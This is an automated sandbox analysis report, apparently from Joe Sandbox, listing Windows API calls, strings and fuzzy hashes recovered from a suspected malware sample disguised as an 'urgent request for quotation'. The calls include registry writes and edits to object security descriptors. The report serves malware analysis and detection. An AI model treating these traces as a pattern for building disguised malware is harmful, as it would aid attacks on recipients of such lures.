                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4124339563-0
                                                                                                                      • Opcode ID: c0f2fd96c4acf01b61641671078a1348d34dad8f4ea9f0958f6bcfb8e353f47e
                                                                                                                      • Instruction ID: 72a56fa44a5af90ef38c3fd14f52cd8f3825bc62f417626113e36e6e2604d048
                                                                                                                      • Opcode Fuzzy Hash: c0f2fd96c4acf01b61641671078a1348d34dad8f4ea9f0958f6bcfb8e353f47e
                                                                                                                      • Instruction Fuzzy Hash: 19A19D72008701AFEB109F64DC48E6F7BE9FB89320F140A19F9AA961E1D778E944CF51
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?), ref: 00048E14
                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00086AC5
                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00086AFE
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00086F43
                                                                                                                        • Part of subcall function 00048F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00048BE8,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048FC5
                                                                                                                      • SendMessageW.USER32(?,00001053), ref: 00086F7F
                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00086F96
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00086FAC
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00086FB7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2760611726-4108050209
                                                                                                                      • Opcode ID: 6118c3b57d92d2c804a9f5829226d1140804a8a49659f1bb36232c286d476e96
                                                                                                                      • Instruction ID: 08016a8475fab9aaf18e2b5fd2bd5019e1f5f69a35562e07aedb61c9b5f7cd68
                                                                                                                      • Opcode Fuzzy Hash: 6118c3b57d92d2c804a9f5829226d1140804a8a49659f1bb36232c286d476e96
                                                                                                                      • Instruction Fuzzy Hash: 8712BC70600201EFDB65EF14C848FAAB7E1FB44304F158469F4C98B662CB36EC92CB55
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 000B273E
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 000B286A
                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 000B28A9
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 000B28B9
                                                                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 000B2900
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 000B290C
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 000B2955
                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 000B2964
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 000B2974
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 000B2978
                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 000B2988
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000B2991
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 000B299A
                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 000B29C6
                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 000B29DD
                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 000B2A1D
                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 000B2A31
                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 000B2A42
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 000B2A77
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 000B2A82
                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 000B2A8D
                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 000B2A97
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                      • Opcode ID: 30db2170360cbf4af837c454e2add321c856227aa6cb118675cfc1c767c2db4a
                                                                                                                      • Instruction ID: 039f358524aa97314e5f24d19c7a8972b06eefe5678b96bca3595940f75304f1
                                                                                                                      • Opcode Fuzzy Hash: 30db2170360cbf4af837c454e2add321c856227aa6cb118675cfc1c767c2db4a
                                                                                                                      • Instruction Fuzzy Hash: F0B14D71A40215BFEB14DFA8CC49FAE7BA9FB08710F004114FA15EB691DBB4AD40CB94
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 000A4AED
                                                                                                                      • GetDriveTypeW.KERNEL32(?,000CCB68,?,\\.\,000CCC08), ref: 000A4BCA
                                                                                                                      • SetErrorMode.KERNEL32(00000000,000CCB68,?,\\.\,000CCC08), ref: 000A4D36
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                      • Opcode ID: 5ce058e91399b94fbfe8ed63e5568ff7f3820391cddc31c4693770c87b257e55
                                                                                                                      • Instruction ID: 10aaf39bc2af0a52dc51ec76496237a865259de0f69f58e2db9fd165dcb0ac8f
                                                                                                                      • Opcode Fuzzy Hash: 5ce058e91399b94fbfe8ed63e5568ff7f3820391cddc31c4693770c87b257e55
                                                                                                                      • Instruction Fuzzy Hash: F8613738701209DBCB54DFA4C982DBC77B1EB86310B248015FA0AAFA52CBF6DD45EB51
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000012), ref: 000C7421
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 000C7425
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000C743B
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 000C7446
                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 000C744B
                                                                                                                      • GetSysColor.USER32(00000011), ref: 000C7463
                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 000C7471
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 000C7482
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 000C748B
                                                                                                                      • SelectObject.GDI32(?,?), ref: 000C7498
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 000C74B7
                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000C74CE
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 000C74DB
                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C752A
                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000C7554
                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 000C7572
                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 000C757D
                                                                                                                      • GetSysColor.USER32(00000011), ref: 000C758E
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 000C7596
                                                                                                                      • DrawTextW.USER32(?,000C70F5,000000FF,?,00000000), ref: 000C75A8
                                                                                                                      • SelectObject.GDI32(?,?), ref: 000C75BF
                                                                                                                      • DeleteObject.GDI32(?), ref: 000C75CA
                                                                                                                      • SelectObject.GDI32(?,?), ref: 000C75D0
                                                                                                                      • DeleteObject.GDI32(?), ref: 000C75D5
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 000C75DB
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 000C75E5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1996641542-0
                                                                                                                      • Opcode ID: 2d0b33cd3057466b8cd0ba1750562e65df78574d4070f96e632a0ff0cecbafd8
                                                                                                                      • Instruction ID: 89af01db6535885ef6a9f1e38068d1232e0dfc0a84c58ae744231a97ce497f02
                                                                                                                      • Opcode Fuzzy Hash: 2d0b33cd3057466b8cd0ba1750562e65df78574d4070f96e632a0ff0cecbafd8
                                                                                                                      • Instruction Fuzzy Hash: 00615C72900218AFEF119FA4DC49EEEBFB9EB09320F154115FA19AB2A1D7749940CF90
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 000C1128
                                                                                                                      • GetDesktopWindow.USER32 ref: 000C113D
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 000C1144
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C1199
                                                                                                                      • DestroyWindow.USER32(?), ref: 000C11B9
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000C11ED
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C120B
                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000C121D
                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 000C1232
                                                                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 000C1245
                                                                                                                      • IsWindowVisible.USER32(00000000), ref: 000C12A1
                                                                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 000C12BC
                                                                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 000C12D0
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000C12E8
                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 000C130E
                                                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 000C1328
                                                                                                                      • CopyRect.USER32(?,?), ref: 000C133F
                                                                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 000C13AA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                      • Opcode ID: 4783d556c4735a6cd596822aac5b6f5db8ea4c01ce55ba74044ed1ef4784eb78
                                                                                                                      • Instruction ID: 583ff4e4d209f3c7b39da738ba360cc94d4f103e2d1c4e01fd9bffe855240aa2
                                                                                                                      • Opcode Fuzzy Hash: 4783d556c4735a6cd596822aac5b6f5db8ea4c01ce55ba74044ed1ef4784eb78
                                                                                                                      • Instruction Fuzzy Hash: E9B17971608341AFE754DF64C984FAEBBE4EF85354F00891CF9999B2A2C771E844CB92
                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00048968
                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00048970
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0004899B
                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 000489A3
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 000489C8
                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000489E5
                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000489F5
                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00048A28
                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00048A3C
                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00048A5A
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00048A76
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00048A81
                                                                                                                        • Part of subcall function 0004912D: GetCursorPos.USER32(?), ref: 00049141
                                                                                                                        • Part of subcall function 0004912D: ScreenToClient.USER32(00000000,?), ref: 0004915E
                                                                                                                        • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000001), ref: 00049183
                                                                                                                        • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000002), ref: 0004919D
                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,000490FC), ref: 00048AA8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                      • Opcode ID: a9568d17f67f58973a9484d708b1544ea8f5ce0b3ad6449eb979445a26d06545
                                                                                                                      • Instruction ID: c7dd7c9e7d2c053a71ae1f9d1ce0314c0c1da3cc987d3d7e30c8f0ae1640681a
                                                                                                                      • Opcode Fuzzy Hash: a9568d17f67f58973a9484d708b1544ea8f5ce0b3ad6449eb979445a26d06545
                                                                                                                      • Instruction Fuzzy Hash: 7EB19E71A00209EFEB14DFA8CD45FAE3BB5FB48314F118229FA55A7290DB74E841CB55
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
                                                                                                                        • Part of subcall function 000910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
                                                                                                                        • Part of subcall function 000910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
                                                                                                                        • Part of subcall function 000910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
                                                                                                                        • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00090DF5
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00090E29
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00090E40
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00090E7A
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00090E96
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00090EAD
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00090EB5
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00090EBC
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00090EDD
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00090EE4
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00090F13
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00090F35
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00090F47
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F6E
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090F75
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F7E
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090F85
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F8E
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090F95
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00090FA1
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090FA8
                                                                                                                        • Part of subcall function 00091193: GetProcessHeap.KERNEL32(00000008,00090BB1,?,00000000,?,00090BB1,?), ref: 000911A1
                                                                                                                        • Part of subcall function 00091193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00090BB1,?), ref: 000911A8
                                                                                                                        • Part of subcall function 00091193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00090BB1,?), ref: 000911B7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4175595110-0
                                                                                                                      • Opcode ID: dfad3d31c0851d7322c708b073b44debc4897e4e52087dd29384a697bb5b9cf5
                                                                                                                      • Instruction ID: 8aa25acf5d8b18ff0e564f04a6c7e099aa5fbe87e547e95e3cfe678029aad0e0
                                                                                                                      • Opcode Fuzzy Hash: dfad3d31c0851d7322c708b073b44debc4897e4e52087dd29384a697bb5b9cf5
                                                                                                                      • Instruction Fuzzy Hash: 7171487290020AAFEF60DFA5DC48FEEBBB8FF05310F148125F919A6191D7759A05DB60
                                                                                                                      APIs
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BC4BD
                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,000CCC08,00000000,?,00000000,?,?), ref: 000BC544
                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 000BC5A4
                                                                                                                      • _wcslen.LIBCMT ref: 000BC5F4
                                                                                                                      • _wcslen.LIBCMT ref: 000BC66F
                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 000BC6B2
                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 000BC7C1
                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 000BC84D
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000BC881
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000BC88E
                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 000BC960
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                      • API String ID: 9721498-966354055
                                                                                                                      • Opcode ID: 9e39fec4c4b8bc964bd26a17f1f357269e3e3f5976b1e486196faa32377699c2
                                                                                                                      • Instruction ID: 9904c0e25ffc63980de01a3d473094635280f5632f521ee044f8dd8b57e3d3db
                                                                                                                      • Opcode Fuzzy Hash: 9e39fec4c4b8bc964bd26a17f1f357269e3e3f5976b1e486196faa32377699c2
                                                                                                                      • Instruction Fuzzy Hash: C1127A756046019FEB25DF14C881FAAB7E5EF88314F14885DF88A9B3A2DB71ED41CB81
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 000C09C6
                                                                                                                      • _wcslen.LIBCMT ref: 000C0A01
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000C0A54
                                                                                                                      • _wcslen.LIBCMT ref: 000C0A8A
                                                                                                                      • _wcslen.LIBCMT ref: 000C0B06
                                                                                                                      • _wcslen.LIBCMT ref: 000C0B81
                                                                                                                        • Part of subcall function 0004F9F2: _wcslen.LIBCMT ref: 0004F9FD
                                                                                                                        • Part of subcall function 00092BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00092BFA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                      • API String ID: 1103490817-4258414348
                                                                                                                      • Opcode ID: 356c416cede4caf64e51dab3dcacc0a404b697dec4c79aca65f56383ca70e2c6
                                                                                                                      • Instruction ID: 96468690354b633e399678357ec144fed286cec19ee39adced017b4ab1ca3574
                                                                                                                      • Opcode Fuzzy Hash: 356c416cede4caf64e51dab3dcacc0a404b697dec4c79aca65f56383ca70e2c6
                                                                                                                      • Instruction Fuzzy Hash: 03E18771208701DFCB24DF28C450A6EB7E1BF98314F50895CF89A9B2A2DB31ED45CB82
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
